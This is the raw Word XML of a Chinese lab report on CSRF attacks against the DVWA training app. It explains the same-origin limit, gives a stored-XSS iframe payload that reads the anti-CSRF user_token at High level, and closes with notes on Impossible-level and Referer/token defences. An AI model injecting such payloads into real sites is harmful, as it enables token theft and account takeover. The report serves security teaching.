        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是漏洞网站服务器的链接。而我们的脚本执行的位置是我们自己搭的一个服务器，所以我们的攻击脚本是不可能跨域取到改密界面中的user_token。这是浏览器的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>同源策略</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>决定的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:ind w:firstLine="440" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要想获取到用户的token,并提交修改密码的表单的话，就必须得把攻击脚本注入到目标服务器中 。而要想注入到目标服务器，同时得发挥作用，获取用户的 token修改密码的话，就得和XSS漏洞一起结合实现了。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:ind w:firstLine="440" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们将如下代码通过存储型XSS插入到数据库中，这语句会弹出用户的token</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>&lt;iframe src="../csrf/" οnlοad=alert(frames[0].document.getElementsByName('user_token')[0].value)&gt;&lt;/iframe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>过程：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:ind w:firstLine="460" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>利用High级别的XSS漏洞协助获取Anti-CSRF token（因为这里的XSS注入有长度限制，不能够注入完整的攻击脚本，所以只获取Anti-CSRF token）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="069AEF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5629275" cy="1914525"/>
            <wp:effectExtent l="0" t="0" r="9525" b="3175"/>
            <wp:docPr id="1" name="图片 1" descr="1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/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>这里的Name存在XSS漏洞，抓包，改参数，成功弹出token：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5262880" cy="2626995"/>
            <wp:effectExtent l="0" t="0" r="7620" b="190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b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="2966085"/>
            <wp:effectExtent l="0" t="0" r="10160" b="571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779520"/>
            <wp:effectExtent l="0" t="0" r="1270" b="508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44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Impossible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>级别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查看源代码：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5262880" cy="2181860"/>
            <wp:effectExtent l="0" t="0" r="7620" b="254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ind w:firstLine="440" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>impossible级别修改密码需要输入之前的密码，黑客无法知道用户之前的密码，所以无法进行CSRF攻击。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实验心得</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1395"/>
        </w:tabs>
        <w:ind w:firstLine="440" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通过本次实验，我深入了解了CSRF攻击的原理和防御措施。在不同级别的DVWA设置下，尝试了各种方式的攻击，并了解了如何通过增加安全措施（如Referer验证、CSRF Token机制）来有效防御这些攻击。对于安全开发而言，防范CSRF攻击是非常重要的，通过正确的编码实践和安全配置，可以有效保护Web应用免受此类攻击。同时，也认识到攻击和防御的对抗是一个不断升级的过程，需</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>要持续的学习和实践。</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="708" w:footer="708" w:gutter="0"/>
      <w:cols w:space="708" w:num="1"/>
      <w:docGrid w:type="line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9C168E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F99C168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000000"/>
    <w:rsid w:val="08F8136C"/>
    <w:rsid w:val="0A3208AE"/>
    <w:rsid w:val="1ED54C34"/>
    <w:rsid w:val="2D805B53"/>
    <w:rsid w:val="2E516BDC"/>
    <w:rsid w:val="32A674FB"/>
    <w:rsid w:val="35BA15D4"/>
    <w:rsid w:val="3EB94B1E"/>
    <w:rsid w:val="43030A5E"/>
    <w:rsid w:val="48EE2191"/>
    <w:rsid w:val="4ADC2D27"/>
    <w:rsid w:val="663D4344"/>
    <w:rsid w:val="78BE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autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
  </w:style>
  <w:style w:type="table" w:default="1" w:styleId="9">
    <w:name w:val="Normal Table"/>
    <w:autoRedefine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autoRedefine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7">
    <w:name w:val="header"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="15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8">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine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character" w:styleId="11">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="10"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="22"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="12">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="10"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="13">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="10"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="14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5">
    <w:name w:val="页眉 Char"/>
    <w:basedOn w:val="10"/>
    <w:link w:val="7"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="16">
    <w:name w:val="页脚 Char"/>
    <w:basedOn w:val="10"/>
    <w:link w:val="6"/>
    <w:autoRedefine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jpeg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://image.3001.net/images/20161031/14778957473585.png" TargetMode="Externa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89ED565-0975-430B-99A3-994BAA2C77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1060</Words>
  <Characters>1352</Characters>
  <Paragraphs>61</Paragraphs>
  <TotalTime>1</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1360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22737</dc:creator>
  <cp:lastModifiedBy>`</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-25T16:46:07Z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290912E823BD457F848EFCDC86451ED0_13</vt:lpwstr>
  </property>
</Properties>
</file>